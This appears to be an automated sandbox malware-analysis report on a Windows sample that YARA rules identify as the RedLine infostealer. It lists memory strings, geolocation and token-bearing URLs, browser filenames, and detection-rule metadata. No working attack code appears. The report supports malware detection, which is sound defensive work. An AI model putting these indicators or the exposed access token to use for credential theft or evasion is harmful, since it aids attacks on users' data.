Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003300000.00000004.00000800.00020000.00000000.sdmp, lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003453000.00000004.00000800.00020000.00000000.sdmp, lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmp, lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003300000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003300000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip
Source: lWnSA7IyVc.exe, lWnSA7IyVc.exe, 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: lWnSA7IyVc.exe, lWnSA7IyVc.exe, 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: lWnSA7IyVc.exe	String found in binary or memory: https://api.particle.io/v1/devices/13300350003473433373737385/digitalread?access_token=Q235ad2c91cac
Source: tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: lWnSA7IyVc.exe, lWnSA7IyVc.exe, 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.lWnSA7IyVc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 2.2.lWnSA7IyVc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.lWnSA7IyVc.exe.35524c8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.lWnSA7IyVc.exe.35524c8.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.lWnSA7IyVc.exe.36f37f8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.lWnSA7IyVc.exe.35524c8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.lWnSA7IyVc.exe.36f37f8.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.lWnSA7IyVc.exe.35524c8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.lWnSA7IyVc.exe.36f37f8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.lWnSA7IyVc.exe.36f37f8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000000.00000002.1685222888.0000000003572000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: lWnSA7IyVc.exe PID: 2008, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: lWnSA7IyVc.exe PID: 3808, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 0_2_00A743E8	0_2_00A743E8
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 0_2_00A7E094	0_2_00A7E094
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 0_2_00A77051	0_2_00A77051
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 0_2_0698F788	0_2_0698F788
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 0_2_069841C4	0_2_069841C4
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 0_2_0698F778	0_2_0698F778
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 0_2_06980040	0_2_06980040
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 0_2_069841BD	0_2_069841BD
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 0_2_06986D33	0_2_06986D33
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 0_2_0698CAD8	0_2_0698CAD8
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 0_2_0698CAC7	0_2_0698CAC7
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 0_2_0698C830	0_2_0698C830
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 0_2_0698C840	0_2_0698C840
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 0_2_069A3D80	0_2_069A3D80
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 0_2_069A3DFB	0_2_069A3DFB
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 0_2_069A8670	0_2_069A8670
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 0_2_069A9380	0_2_069A9380
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 0_2_069A73D0	0_2_069A73D0
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 0_2_069A73C1	0_2_069A73C1
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 0_2_069AE0F0	0_2_069AE0F0
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 0_2_069A6F98	0_2_069A6F98
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 0_2_069A8F38	0_2_069A8F38
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 0_2_069A6F5C	0_2_069A6F5C
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 0_2_069A8F48	0_2_069A8F48
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 0_2_069A3D70	0_2_069A3D70
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 2_2_0188E7B0	2_2_0188E7B0
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 2_2_0188DC90	2_2_0188DC90
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 2_2_06B14468	2_2_06B14468
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 2_2_06B19628	2_2_06B19628
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 2_2_06B11210	2_2_06B11210
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 2_2_06B13320	2_2_06B13320
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 2_2_06B1DD00	2_2_06B1DD00
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 2_2_06B1D108	2_2_06B1D108
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Code function: 2_2_06B1D9E6	2_2_06B1D9E6

Source: lWnSA7IyVc.exe, 00000000.00000002.1687881526.00000000050E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs lWnSA7IyVc.exe
Source: lWnSA7IyVc.exe, 00000000.00000002.1684012075.000000000077E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs lWnSA7IyVc.exe
Source: lWnSA7IyVc.exe, 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs lWnSA7IyVc.exe
Source: lWnSA7IyVc.exe, 00000000.00000000.1657210728.0000000000182000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenametdrF.exeF vs lWnSA7IyVc.exe
Source: lWnSA7IyVc.exe, 00000000.00000002.1688992611.00000000073B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs lWnSA7IyVc.exe
Source: lWnSA7IyVc.exe, 00000000.00000002.1684656014.0000000002531000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs lWnSA7IyVc.exe
Source: lWnSA7IyVc.exe, 00000000.00000002.1684656014.0000000002531000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs lWnSA7IyVc.exe
Source: lWnSA7IyVc.exe, 00000000.00000002.1685222888.0000000003572000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs lWnSA7IyVc.exe
Source: lWnSA7IyVc.exe, 00000000.00000002.1685222888.0000000003572000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs lWnSA7IyVc.exe
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003344000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs lWnSA7IyVc.exe
Source: lWnSA7IyVc.exe, 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs lWnSA7IyVc.exe
Source: lWnSA7IyVc.exe, 00000002.00000002.1868707431.00000000013D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs lWnSA7IyVc.exe
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefirefox.exe0 vs lWnSA7IyVc.exe
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs lWnSA7IyVc.exe
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs lWnSA7IyVc.exe
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamechrome.exe< vs lWnSA7IyVc.exe
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs lWnSA7IyVc.exe
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs lWnSA7IyVc.exe
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIEXPLORE.EXED vs lWnSA7IyVc.exe
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\080904B0\\OriginalFilename vs lWnSA7IyVc.exe
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsedge.exe> vs lWnSA7IyVc.exe
Source: lWnSA7IyVc.exe	Binary or memory string: OriginalFilenametdrF.exeF vs lWnSA7IyVc.exe

Source: lWnSA7IyVc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 2.2.lWnSA7IyVc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 2.2.lWnSA7IyVc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.lWnSA7IyVc.exe.35524c8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.lWnSA7IyVc.exe.35524c8.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.lWnSA7IyVc.exe.36f37f8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.lWnSA7IyVc.exe.35524c8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.lWnSA7IyVc.exe.36f37f8.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.lWnSA7IyVc.exe.35524c8.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.lWnSA7IyVc.exe.36f37f8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.lWnSA7IyVc.exe.36f37f8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000000.00000002.1685222888.0000000003572000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: lWnSA7IyVc.exe PID: 2008, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: lWnSA7IyVc.exe PID: 3808, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: lWnSA7IyVc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, KpXSP7a4XKGwMYNe9W.cs	Security API names: _0020.SetAccessControl
